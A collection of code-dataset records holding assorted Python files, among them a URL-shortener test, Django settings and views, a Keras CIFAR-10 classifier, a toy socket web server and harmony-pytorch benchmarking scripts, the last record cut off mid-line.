+{"seq_id":"453122273","text":"#!/usr/bin/env python\n# encoding: utf-8\ntry:\n    from urllib import urlencode\nexcept ImportError:\n    from urllib.parse import urlencode\n\nfrom pyshorteners import Shortener, Shorteners\nfrom pyshorteners.shorteners import AwsmShortener\nfrom pyshorteners.exceptions import (ShorteningErrorException,\n                                     ExpandingErrorException)\n\nimport responses\nimport pytest\n\napi_key = 'FAKE_KEY'\ns = Shortener(Shorteners.AWSM, api_key=api_key, tool='abcde')\nshort_url = 'http://aw.sm/rjf0oI'\nexpanded = 'http://www.test.com'\n\n\n@responses.activate\ndef test_awsm_short_method():\n    # mock response\n    params = urlencode({\n        'url': expanded,\n        'key': api_key,\n        'channel': 'twitter',\n        'tool': 'abcde',\n        'v': 3\n    })\n    url = '{0}url.txt?{1}'.format(s.api_url, params)\n    responses.add(responses.POST, url, body=short_url, match_querystring=True)\n\n    shorten = s.short(expanded)\n    assert shorten == short_url\n\n\n@responses.activate\ndef test_awsm_short_method_bad_response():\n    url = '{}url.txt'.format(s.api_url)\n    responses.add(responses.POST, url, body=short_url, status=400)\n\n    with pytest.raises(ShorteningErrorException):\n        s.short(expanded)\n\n\n@responses.activate\ndef test_awsm_expand_method_bad_response():\n    responses.add(responses.GET, short_url, body='', status=400,\n                  match_querystring=True)\n\n    with pytest.raises(ExpandingErrorException):\n        s.expand(short_url)\n\n\ndef test_generate_tool_staticmethod():\n    tool = AwsmShortener._generate_random_tool()\n    assert len(tool) == 4\n\n\ndef test_bad_key():\n    s = Shortener(Shorteners.AWSM)\n\n    with pytest.raises(TypeError):\n        s.short(expanded)\n","sub_path":"tests/test_awsm.py","file_name":"test_awsm.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"486958311","text":"from settings import *\nimport os\n\n# Update database configuration with $DATABASE_URL.\nimport dj_database_url\ndb_from_env = dj_database_url.config()\nDATABASES['default'].update(db_from_env)\n\n\nPROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))\n\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')\nSTATIC_URL = '/static/'\n\n\nSTATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'\n\nDEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\nAWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY']\nAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_KEY']\nAWS_STORAGE_BUCKET_NAME = os.environ['AWS_BUCKET']","sub_path":"cartotron/heroku.py","file_name":"heroku.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"293518402","text":"from collections import defaultdict\nimport sys\n\n\ndef hanoi(height, left='left', right='right', middle='middle'):\n    if height:\n        hanoi(height-1, left, middle, right)\n        topdisk = d[left].pop(-1)\n        d[right].append(topdisk)\n        print(\"\\n\")\n        print(left, \"=>\", right)\n        cols = ['left', 'middle', 'right']\n\n        print(str(dict(zip(cols, [d[col] for col in cols]))))\n        hanoi(height-1, middle, right, left)\n\n\nn = 3 if len(sys.argv) < 2 else int(sys.argv[1])\n\nd = defaultdict(list)\nd['left'] = list(range(1, n+1)[::-1])\nd['right'] = []\nd['middle'] = []\nhanoi(n)\n","sub_path":"100days_algorithm/day1_hanoitower.py","file_name":"day1_hanoitower.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"13770140","text":"import math\nimport emoji\n\nvNumber = float(input('Please give me a float number:'))\nprint(math.trunc(vNumber))\nprint(emoji.emojize('Python is :thumbs_up:'))\n\n# a2 = b2 + c2\n\nvB = float(input('Entre com o cateto 1: '))\nvC = float(input('Entre com o cateto 2: '))\n\nprint('O Valor da hipotenusa é: ', math.hypot(vB, vC))\n\nvAngulo = float(input('Entre com o ângulo: '))\n\nvSeno = math.sin(math.radians(vAngulo))\nvCosseno = math.cos(math.radians(vAngulo))\nvTangente = math.tan(math.radians(vAngulo))\n\nprint('O ângulo {} tem o Seno = {:.2f}, o Cosseno = {:.2f} e a Tangente = {:.2f}'.format(vAngulo, vSeno, vCosseno, vTangente))\n","sub_path":"Curso de Python - Youtube/desafio016.py","file_name":"desafio016.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"460319388","text":"\"\"\"Request logger views\"\"\"\nfrom django.views.generic.list import ListView\nfrom request_logger.models import RequestLogEntry\n\n\nclass RequestFirstLogRecordsView(ListView):\n    \"\"\"Renders requests log, showing first N requests\"\"\"\n    model = RequestLogEntry\n    template_name = 'request_log.html'\n    count = 10\n\n    def get_queryset(self):\n        queryset = super(RequestFirstLogRecordsView, self).get_queryset()\n        queryset = queryset.order_by('priority', 'request_datetime')\n        queryset = queryset[:self.count]\n        return queryset\n\n\nshow_log = RequestFirstLogRecordsView.as_view()\n","sub_path":"request_logger/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"451757631","text":"import GameObjects\nfrom Utils import Display\nimport cv2 as cv\n\nwidth = 30 \nheight = 20\nscale = 20  #Render scale factor\ndelay = 0   #cv.waitKey delay\ndi = Display.Display(delay,width,height,scale)\nb = GameObjects.Board(width = width, height = height)\n\nui = di.draw(b)\ndi.show(a=[ui])\n\ncv.destroyAllWindows()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"473239972","text":"import random\nimport matplotlib.pyplot as plt\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Activation, Flatten, Dropout\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras.optimizers import SGD\nimport numpy as np\nimport sys\nfrom keras.preprocessing.image import ImageDataGenerator\nIMAGE_SIZE = 32\nNUM_ITER = 10\nBATCH_SIZE = 128\nNUM_CATEGORIES = 10\n\n\n# Extract data from pickle files\ndef unpickle(file):\n    import cPickle\n    fo = open(file, 'rb')\n    dict = cPickle.load(fo)\n    fo.close()\n    return dict\n\n\n# Reshape image data for pyplot\ndef process_image(img):\n    pixels = []\n    image = []\n\n    for i in range(IMAGE_SIZE*IMAGE_SIZE):\n        pixel = [img[i], img[i+(IMAGE_SIZE*IMAGE_SIZE)],\n                img[i+(IMAGE_SIZE*IMAGE_SIZE*2)]]\n        pixels += [pixel]\n\n    for i in range(IMAGE_SIZE):\n        row = []\n        for j in range(IMAGE_SIZE):\n            row += [pixels[(IMAGE_SIZE*i)+j]]\n        image += [row]\n\n    return image\n\n\n# check command line args for number of iterations\nif (len(sys.argv) > 1):\n    NUM_ITER = int(sys.argv[1])\n\n\n# Extract image data from cifar-10 files\nprint(\"Processing data...\")\ndata_1 = unpickle(\"cifar-10-batches-py/data_batch_1\")\ndata_2 = unpickle(\"cifar-10-batches-py/data_batch_2\")\ndata_3 = unpickle(\"cifar-10-batches-py/data_batch_3\")\ndata_4 = unpickle(\"cifar-10-batches-py/data_batch_4\")\ndata_5 = unpickle(\"cifar-10-batches-py/data_batch_5\")\ntest = unpickle(\"cifar-10-batches-py/test_batch\")\nmeta = unpickle(\"cifar-10-batches-py/batches.meta\")\n\n\n#combine datasets\ndata_all = np.vstack([data_1[\"data\"], data_2[\"data\"], data_3[\"data\"], data_4[\"data\"], data_5[\"data\"]])\nlabels_all = data_1[\"labels\"] + data_2[\"labels\"] + data_3[\"labels\"] + data_4[\"labels\"] + data_5[\"labels\"]\n\n\n# Process data for training\ntest_data = test[\"data\"]\ntest_labels = np_utils.to_categorical(np.array(test[\"labels\"]), NUM_CATEGORIES)\nlabels = np_utils.to_categorical(np.array(labels_all), NUM_CATEGORIES)\n\ndata_all = data_all.reshape(data_all.shape[0], 3, 32, 32)\ntest_data = test_data.reshape(test_data.shape[0], 3, 32, 32)\n\ndata_all = data_all.astype('float32')\ntest_data = test_data.astype('float32')\ndata_all /= 255\ntest_data /= 255\n\n\n# Define network\nprint(\"Generating model...\")\nmodel = Sequential()\n\nmodel.add(Convolution2D(32, 3, 3, border_mode=\"same\", input_shape=(3, 32, 32)))\nmodel.add(Activation(\"relu\"))\nmodel.add(Convolution2D(46, 3, 3))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(.3))\nmodel.add(Convolution2D(64, 3, 3, border_mode=\"same\"))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(.3))\nmodel.add(Flatten())\nmodel.add(Dense(500, input_dim=3072, init=\"glorot_uniform\"))\nmodel.add(Activation(\"relu\"))\nmodel.add(Dense(10, init=\"glorot_uniform\"))\nmodel.add(Activation(\"softmax\"))\n\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=\"adadelta\", metrics=[\"accuracy\"])\n\n\n# Train network\nprint(\"Training...\")\n#model.fit(data_all, labels, nb_epoch=NUM_ITER, batch_size=BATCH_SIZE, shuffle=True)\n\nprint('Using real-time data augmentation.')\n\n# this will do preprocessing and realtime data augmentation\ndatagen = ImageDataGenerator(\n    featurewise_center=False,  # set input mean to 0 over the dataset\n    
samplewise_center=False,  # set each sample mean to 0\n    featurewise_std_normalization=False,  # divide inputs by std of the dataset\n    samplewise_std_normalization=False,  # divide each input by its std\n    zca_whitening=False,  # apply ZCA whitening\n    rotation_range=0,  # randomly rotate images in the range (degrees, 0 to 180)\n    width_shift_range=0.1,  # randomly shift images horizontally (fraction of total width)\n    height_shift_range=0.1,  # randomly shift images vertically (fraction of total height)\n    horizontal_flip=True,  # randomly flip images horizontally\n    vertical_flip=False)  # do not flip images vertically\n\n# compute quantities required for featurewise normalization\n# (std, mean, and principal components if ZCA whitening is applied)\ndatagen.fit(data_all)\n\n# fit the model on the batches generated by datagen.flow()\nmodel.fit_generator(datagen.flow(data_all, labels,\n                    batch_size=BATCH_SIZE),\n                    samples_per_epoch=data_all.shape[0],\n                    nb_epoch=NUM_ITER,\n                    validation_data=(test_data, test_labels))\n\n# Test network\nresult = model.evaluate(test_data, test_labels, batch_size=BATCH_SIZE, verbose=0, sample_weight=None)\nprint('Test score:', result[0])\nprint('Test accuracy:', result[1])\n\n\n# Predict results for test data\npredictions = model.predict_classes(test_data, batch_size=BATCH_SIZE, verbose=0)\n\n\n# Display 9 random results from test data\ntest_data = test_data.reshape(test_data.shape[0], 3072)\nfor i in range(9):\n    j = random.randint(0, 9999)  # valid test indices are 0 to 9999\n    plt.subplot(3,3,i+1)\n\n    image = process_image(test_data[j])\n\n    plt.imshow(image, cmap='gray', interpolation='none')\n    plt.title(meta[\"label_names\"][test[\"labels\"][j]] + \" : \" + meta[\"label_names\"][predictions[j]])\nplt.show()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"576832683","text":"import socket\nimport multiprocessing\nimport re\nimport mini_frame\n\n\nclass WSGIServer(object):\n    def __init__(self):\n        # 创建套接字\n        self.tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        # 完成3次握手和4次挥手\n        self.tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        # 绑定\n        self.tcp_server_socket.bind((\"\", 7890))\n        # 监听\n        self.tcp_server_socket.listen(128)\n\n    # 客户端处理线程\n    def deal(self, client_socket):\n        request_content = client_socket.recv(1024).decode(\"utf-8\")\n        ret = re.match(r\"GET (/.*) HTTP/1.1\", request_content)\n        if ret:\n            # 得到()内的结果\n            title = ret.group(1)\n            # print(title)\n            if title == \"/\":\n                title = \"/index.html\"\n            if title.endswith(\".html\"):\n                self.response_static_content(client_socket, title)\n            else:\n                self.response_dynamic_content(client_socket, title)\n\n        client_socket.close()\n\n    # 静态响应处理\n    def response_static_content(self, client_socket, title):\n        # print(\"=========\")\n        # print(title)\n        try:\n            f = open(\"./html\" + title, 'rb')\n        except:\n            f = open(\"./html/404.html\", \"rb\")\n            content = f.read()\n            f.close()\n            client_socket.send(b\"HTTP/1.1 200 OK\\r\\n\" + b\"\\r\\n\" + content)\n        else:\n            content = f.read()\n            f.close()\n            client_socket.send(b\"HTTP/1.1 200 OK\\r\\n\" + b\"\\r\\n\" + content)\n\n    # 动态相应处理\n    def response_dynamic_content(self, client_socket, title):\n        header = \"HTTP/1.1 200 OK\\r\\n\"\n        header += \"\\r\\n\"\n        body = mini_frame.application(title)\n        response = header + body\n        client_socket.send(response.encode(\"utf-8\"))\n\n    def run_forever(self):\n        # 等待客户端链接\n        while True:\n            print(\"----------服务器已经运行-----------\")\n            client_socket, client_addr = self.tcp_server_socket.accept()\n            # 每链接一个客户端,开启一个进程\n            p = multiprocessing.Process(target=self.deal, args=(client_socket,))\n            p.start()\n            client_socket.close()\n        self.tcp_server_socket.close()\n\n\ndef main():\n    # 完成主要逻辑\n    server = WSGIServer()\n    server.run_forever()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Python_Basis_Code/26_mini-web/web_server.py","file_name":"web_server.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"297157727","text":"import numpy as np\nimport glob\nimport os\nimport pandas as pd\npath='/fs/project/PAS1263/src/models/research/object_detection/chairtable/Bndbox/train/'\ngtpath='/fs/project/PAS1263/data/ILSVRC/matconvnet_data/train.csv'\nchair=[];\ntable=[];\nwrongchair=[];\nwrongtable=[];\ndef intersection_over_union(boxA, boxB):\n\t# determine the (x, y)-coordinates of the intersection rectangle\n\txA = max(boxA[0], boxB[0])\n\tyA = max(boxA[1], boxB[1])\n\txB = min(boxA[2], boxB[2])\n\tyB = min(boxA[3], boxB[3])\n \n\t# compute the area of intersection rectangle\n\tinterArea = (xB - xA + 1) * (yB - yA + 1)\n \n\t# compute the area of both the prediction and ground-truth\n\t# rectangles\n\tboxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1]+ 1)\n\tboxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)\n \n\t# compute the intersection over union by taking the intersection\n\t# area and dividing it by the sum of prediction + ground-truth\n\t# areas - the interesection area\n\tiou = interArea / float(boxAArea + boxBArea - interArea)\n \n\t# return the intersection over union value\n\treturn iou\n\n\ndf1=pd.read_csv(gtpath)\ndf2=df1.set_index(\"filename\")    \nfor bndbox_path in glob.glob(path+'*.txt.npz'):\n    Data=np.load(bndbox_path)\n    position=Data['arr_0']\n    position=position[0]\n    prob=Data['arr_1']\n    prob=prob[0]\n    category=Data['arr_2']\n    category=category[0]\n    path,temp=os.path.split(bndbox_path)\n    file_name,rest1,rest2,rest3=temp.split(\".\")\n    if df1[df1['filename'].str.contains(file_name)==True].empty!=True:\n       temp=df2.loc[file_name,]\n       data=temp.as_matrix()\n       if data.ndim!=1:\n                for i in range(0,300):\n                    for j in range(0,data.shape[0]):\n                         boxA=[position[i,1],position[i,0],position[i,3],position[i,2]]\n                         boxB=[data[j,3]*1.0/data[j,0],data[j,5]*1.0/data[j,1],data[j,4]*1.0/data[j,0],data[j,6]*1.0/data[j,1]]\n                         if intersection_over_union(boxA, boxB)>0.5:\n                                if data[j,2]=='n03001627' and category[i]==1:\n                                     chair.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n                                elif data[j,2]=='n03001627' and category[i]!=1:\n                                     wrongchair.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n                                elif data[j,2]=='n04379243' and category[i]==2:\n                                     table.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n                                elif data[j,2]=='n04379243' and category[i]!=2:\n                                     wrongtable.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n       else:\n                 for i in range(0,300):\n                         boxA=[position[i,1],position[i,0],position[i,3],position[i,2]]\n                         boxB=[data[3]*1.0/data[0],data[5]*1.0/data[1],data[4]*1.0/data[0],data[6]*1.0/data[1]]\n                         if intersection_over_union(boxA, boxB)>0.5:\n                                if data[2]=='n03001627' and category[i]==1:\n                                     chair.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n                                elif data[2]=='n03001627' and category[i]!=1:\n                                     
wrongchair.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n                                elif data[2]=='n04379243' and category[i]==2:\n                                     table.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n                                elif data[2]=='n04379243' and category[i]!=2:\n                                     wrongtable.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n\n\nnp.save('../prior/sizechair',chair)\nnp.save('../prior/sizetable',table)\nnp.save('../prior/wrongsizechair',wrongchair)\nnp.save('../prior/wrongsizetable',wrongtable)\n","sub_path":"faster-rcnn-base-model/code/sizekde.py","file_name":"sizekde.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"445390204","text":"import numpy as np\nimport pandas as pd\nimport pegasus as pg\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nimport os, sys, time, re\n\nfrom harmony import harmonize\nfrom harmonypy import run_harmony\nfrom anndata import AnnData\nfrom scipy.stats import pearsonr\nfrom scipy.sparse import csr_matrix\n\n\nmetric_dict = {'r': 'Correlation', 'L2': 'L2 Error'}\n\ndef check_metric(Z_torch, Z_py, Z_R, prefix, norm):\n    assert Z_torch.shape == Z_py.shape and Z_py.shape == Z_R.shape\n\n    metric_torch = []\n    for i in range(Z_torch.shape[1]):\n        m = get_measure(Z_torch[:, i], Z_R[:, i], norm)\n        metric_torch.append(m)\n\n    print(\"Mean {metric} by harmony-pytorch = {value:.4f}\".format(metric = metric_dict[norm], value = np.mean(metric_torch)))\n    np.savetxt(\"./result/{prefix}_{metric}_torch.txt\".format(prefix = prefix, metric = norm), metric_torch)\n\n    metric_py = []\n    for i in range(Z_py.shape[1]):\n        m = get_measure(Z_py[:, i], Z_R[:, i], norm)\n        metric_py.append(m)\n\n    print(\"Mean {metric} by harmonypy = {value:.4f}\".format(metric = metric_dict[norm], value = np.mean(metric_py)))\n    np.savetxt(\"./result/{prefix}_{metric}_py.txt\".format(prefix = prefix, metric = norm), metric_py)\n\n\ndef get_measure(x, base, norm):\n    assert norm in ['r', 'L2']\n\n    if norm == 'r':\n        corr, _ = pearsonr(x, base)\n        return corr\n    else:\n        return np.linalg.norm(x - base) / np.linalg.norm(base)\n\n\ndef plot_umap(adata, Z_torch, Z_py, Z_R, prefix, batch_key):\n    if adata is not None:\n        adata.obsm['X_torch'] = Z_torch\n        adata.obsm['X_py'] = Z_py\n        adata.obsm['X_harmony'] = Z_R\n\n        pg.neighbors(adata, rep = 'torch')\n        pg.umap(adata, rep = 'torch', out_basis = 'umap_torch')\n\n        pg.neighbors(adata, rep = 'py')\n        pg.umap(adata, rep = 'py', out_basis = 'umap_py')\n\n        pg.neighbors(adata, rep = 'harmony')\n        pg.umap(adata, rep = 'harmony', out_basis = 'umap_harmony')\n\n        pg.write_output(adata, \"./result/{}_result\".format(prefix))\n    else:\n        print(\"Use precalculated AnnData result.\")\n\n    if os.system(\"pegasus plot scatter --basis umap --attributes {attr} --alpha 0.5 ./result/{name}_result.h5ad ./plots/{name}.before.umap.pdf\".format(name = prefix, attr = batch_key)):\n        sys.exit(1)\n\n    if os.system(\"pegasus plot scatter --basis umap_torch --attributes {attr} --alpha 0.5 ./result/{name}_result.h5ad ./plots/{name}.torch.umap.pdf\".format(name = prefix, attr = batch_key)):\n        sys.exit(1)\n\n    if os.system(\"pegasus plot scatter --basis umap_py --attributes {attr} --alpha 0.5 ./result/{name}_result.h5ad ./plots/{name}.py.umap.pdf\".format(name = prefix, attr = batch_key)):\n        sys.exit(1)\n\n    if os.system(\"pegasus plot scatter --basis umap_harmony --attributes {attr} --alpha 0.5 ./result/{name}_result.h5ad ./plots/{name}.harmony.umap.pdf\".format(name = prefix, attr = batch_key)):\n        sys.exit(1)\n\n\ndef test_cell_lines():\n    print(\"Testing on cell lines dataset...\")\n\n    z_files = [f for f in os.listdir(\"./result\") if re.match(\"cell_lines.*_z.(txt|npy)\", f)]\n    if len(z_files) < 3 or not os.path.exists(\"./result/cell_lines_result.h5ad\"):\n        X = np.loadtxt(\"./data/cell_lines/pca.txt\")\n        df_metadata = pd.read_csv(\"./data/cell_lines/metadata.csv\")\n        source_loaded = True\n\n    if os.path.exists(\"./result/cell_lines_torch_z.npy\"):\n        Z_torch = 
np.load(\"./result/cell_lines_torch_z.npy\")\n        print(\"Precalculated embedding by harmony-pytorch is loaded.\")\n    else:\n        start_torch = time.time()\n        Z_torch = harmonize(X, df_metadata, batch_key = 'dataset')\n        end_torch = time.time()\n\n        print(\"Time spent for harmony-pytorch = {:.2f}s.\".format(end_torch - start_torch))\n        np.save(\"./result/cell_lines_torch_z.npy\", Z_torch)\n\n    if os.path.exists(\"./result/cell_lines_py_z.npy\"):\n        Z_py = np.load(\"./result/cell_lines_py_z.npy\")\n        print(\"Precalculated embedding by harmonypy is loaded.\")\n    else:\n        start_py = time.time()\n        ho = run_harmony(X, df_metadata, ['dataset'])\n        end_py = time.time()\n\n        print(\"Time spent for harmonypy = {:.2f}s.\".format(end_py - start_py))\n        print(ho.objective_harmony)\n\n        Z_py = np.transpose(ho.Z_corr)\n        np.save(\"./result/cell_lines_py_z.npy\", Z_py)\n\n    Z_R = np.loadtxt(\"./result/cell_lines_harmony_z.txt\")\n\n    check_metric(Z_torch, Z_py, Z_R, prefix = \"cell_lines\", norm = 'r')\n    check_metric(Z_torch, Z_py, Z_R, prefix = \"cell_lines\", norm = 'L2')\n\n    if os.path.exists(\"./result/cell_lines_result.h5ad\"):\n        adata = None\n    else:\n        n_obs = X.shape[0]\n        adata = AnnData(X = csr_matrix((n_obs, 2)), obs = df_metadata)\n        adata.obsm['X_pca'] = X\n\n        pg.neighbors(adata, rep = 'pca')\n        pg.umap(adata)\n\n    umap_list = [f for f in os.listdir(\"./plots\") if re.match(\"cell_lines.*.pdf\", f)]\n    if len(umap_list) < 4:\n        plot_umap(adata, Z_torch, Z_py, Z_R, prefix = \"cell_lines\", batch_key = \"dataset\")\n\n    if os.path.exists(\"./result/cell_lines_result.h5ad\"):\n       adata = pg.read_input(\"./result/cell_lines_result.h5ad\", h5ad_mode = 'r')\n\n       stat, pvalue, ac_rate = pg.calc_kBET(adata, attr = 'dataset', rep = 'harmony')\n       print(\"kBET for Harmony: statistic = {stat}, p-value = {pval}, ac rate = {ac_rate}\".format(stat = stat, pval = pvalue, ac_rate = ac_rate))\n\n       stat, pvalue, ac_rate = pg.calc_kBET(adata, attr = 'dataset', rep = 'py')\n       print(\"kBET for harmonypy: statistic = {stat}, p-value = {pval}, ac rate = {ac_rate}\".format(stat = stat, pval = pvalue, ac_rate = ac_rate))\n\n       stat, pvalue, ac_rate = pg.calc_kBET(adata, attr = 'dataset', rep = 'torch')\n       print(\"kBET for harmony-pytorch: statistic = {stat}, p-value = {pval}, ac rate = {ac_rate}\".format(stat = stat, pval = pvalue, ac_rate = ac_rate))\n\n\ndef test_pbmc():\n    print(\"Testing on 10x pbmc dataset...\")\n\n    z_files = [f for f in os.listdir(\"./result\") if re.match(\"pbmc.*_z.(txt|npy)\", f)]\n    if len(z_files) < 3 or not os.path.exists(\"./result/pbmc_result.h5ad\"):\n        adata = pg.read_input(\"./data/10x_pbmc/original_data.h5ad\")\n\n    if os.path.exists(\"./result/pbmc_torch_z.npy\"):\n        Z_torch = np.load(\"./result/pbmc_torch_z.npy\")\n        print(\"Precalculated embedding by harmony-pytorch is loaded.\")\n    else:\n        start_torch = time.time()\n        Z_torch = harmonize(adata.obsm['X_pca'], adata.obs, batch_key = 'Channel')\n        end_torch = time.time()\n\n        print(\"Time spent for harmony-pytorch = {:.2f}s.\".format(end_torch - start_torch))\n        np.save(\"./result/pbmc_torch_z.npy\", Z_torch)\n\n    if os.path.exists(\"./result/pbmc_py_z.npy\"):\n        Z_py = np.load(\"./result/pbmc_py_z.npy\")\n        print(\"Precalculated embedding by harmonypy is loaded.\")\n    
else:\n        start_py = time.time()\n        ho = run_harmony(adata.obsm['X_pca'], adata.obs, ['Channel'])\n        end_py = time.time()\n\n        print(ho.objective_harmony)\n        print(\"Time spent for harmonypy = {:.2f}s.\".format(end_py - start_py))\n\n        Z_py = np.transpose(ho.Z_corr)\n        np.save(\"./result/pbmc_py_z.npy\", Z_py)\n\n    Z_R = np.loadtxt(\"./result/pbmc_harmony_z.txt\")\n\n    check_metric(Z_torch, Z_py, Z_R, prefix = \"pbmc\", norm = 'r')\n    check_metric(Z_torch, Z_py, Z_R, prefix = \"pbmc\", norm = 'L2')\n\n    if os.path.exists(\"./result/pbmc_result.h5ad\"):\n        adata = None\n\n    umap_list = [f for f in os.listdir(\"./plots\") if re.match(\"pbmc.*.pdf\", f)]\n    if len(umap_list) < 4:\n        plot_umap(adata, Z_torch, Z_py, Z_R, prefix = \"pbmc\", batch_key = \"Channel\")\n\n\ndef test_mantonbm():\n    print(\"Testing on MantonBM dataset...\")\n\n    z_files = [f for f in os.listdir(\"./result\") if re.match(\"MantonBM.*_z.(txt|npy)\", f)]\n    if len(z_files) < 3 or not os.path.exists(\"./result/MantonBM_result.h5ad\"):\n        adata = pg.read_input(\"./data/MantonBM/original_data.h5ad\")\n        adata.obs['Individual'] = pd.Categorical(adata.obs['Channel'].apply(lambda s: s.split('_')[0][-1]))\n\n    if os.path.exists(\"./result/MantonBM_torch_z.npy\"):\n        Z_torch = np.load(\"./result/MantonBM_torch_z.npy\")\n        print(\"Precalculated embedding by harmony-pytorch is loaded.\")\n    else:\n        start_torch = time.time()\n        Z_torch = harmonize(adata.obsm['X_pca'], adata.obs, batch_key = 'Channel')\n        end_torch = time.time()\n\n        print(\"Time spent for harmony-pytorch = {:.2f}s.\".format(end_torch - start_torch))\n        np.save(\"./result/MantonBM_torch_z.npy\", Z_torch)\n\n    if os.path.exists(\"./result/MantonBM_py_z.npy\"):\n        Z_py = np.load(\"./result/MantonBM_py_z.npy\")\n        print(\"Precalculated embedding by harmonypy is loaded.\")\n    else:\n        start_py = time.time()\n        ho = run_harmony(adata.obsm['X_pca'], adata.obs, ['Channel'])\n        end_py = time.time()\n\n        print(\"Time spent for harmonypy = {:.2f}s.\".format(end_py - start_py))\n\n        Z_py = np.transpose(ho.Z_corr)\n        np.save(\"./result/MantonBM_py_z.npy\", Z_py)\n\n\n    Z_R = np.loadtxt(\"./result/MantonBM_harmony_z.txt\")\n\n    check_metric(Z_torch, Z_py, Z_R, prefix = \"MantonBM\", norm = 'r')\n    check_metric(Z_torch, Z_py, Z_R, prefix = \"MantonBM\", norm = 'L2')\n\n    if os.path.exists(\"./result/MantonBM_result.h5ad\"):\n        adata = None\n\n    umap_list = [f for f in os.listdir(\"./plots\") if re.match(\"MantonBM.*.pdf\", f)]\n    if len(umap_list) < 4:\n        plot_umap(adata, Z_torch, Z_py, Z_R, prefix = \"MantonBM\", batch_key = \"Individual\")\n\n\ndef gen_plot(norm):\n\n    # Cell Lines\n    metric_celllines_torch = np.loadtxt(\"./result/cell_lines_{}_torch.txt\".format(norm))\n    metric_celllines_py = np.loadtxt(\"./result/cell_lines_{}_py.txt\".format(norm))\n\n    df1 = pd.DataFrame({'dataset' : np.repeat(['Cell Lines'], metric_celllines_torch.size + metric_celllines_py.size),\n                        'package' : np.concatenate((np.repeat(['Torch'], metric_celllines_torch.size),\n                                                   np.repeat(['Py'], metric_celllines_py.size)), axis = 0),\n                        'metric' : np.concatenate((metric_celllines_torch, metric_celllines_py), axis = 0)})\n\n    # PBMC\n    metric_pbmc_torch = 
np.loadtxt(\"./result/pbmc_{}_torch.txt\".format(norm))\n    metric_pbmc_py = np.loadtxt(\"./result/pbmc_{}_py.txt\".format(norm))\n\n    df2 = pd.DataFrame({'dataset' : np.repeat(['10x PBMC'], metric_pbmc_torch.size + metric_pbmc_py.size),\n                        'package' : np.concatenate((np.repeat(['Torch'], metric_pbmc_torch.size),\n                                                    np.repeat(['Py'], metric_pbmc_py.size)), axis = 0),\n                        'metric' : np.concatenate((metric_pbmc_torch, metric_pbmc_py), axis = 0)})\n\n    # MantonBM\n    metric_mantonbm_torch = np.loadtxt(\"./result/MantonBM_{}_torch.txt\".format(norm))\n    metric_mantonbm_py = np.loadtxt(\"./result/MantonBM_{}_py.txt\".format(norm))\n\n    df3 = pd.DataFrame({'dataset' : np.repeat(['Bone Marrow'], metric_mantonbm_torch.size + metric_mantonbm_py.size),\n                        'package' : np.concatenate((np.repeat(['Torch'], metric_mantonbm_torch.size),\n                                                    np.repeat(['Py'], metric_mantonbm_py.size)), axis = 0),\n                        'metric' : np.concatenate((metric_mantonbm_torch, metric_mantonbm_py), axis = 0)})\n\n    df = pd.concat([df1, df2, df3])\n\n    # Plot\n    ax = sns.violinplot(x = \"dataset\", y = \"metric\", hue = \"package\", data = df, palette = \"muted\", split = True, cut = 0)\n    ax.set_title(\"{} between Harmonypy and Harmony-pytorch Integration\".format(metric_dict[norm]))\n    ax.set(xlabel = 'Dataset', ylabel = \"{} on PCs\".format(metric_dict[norm]))\n    if norm == 'r':\n        ax.set(ylim = (0.98, 1.001))\n    else:\n        ax.set(ylim = (0, 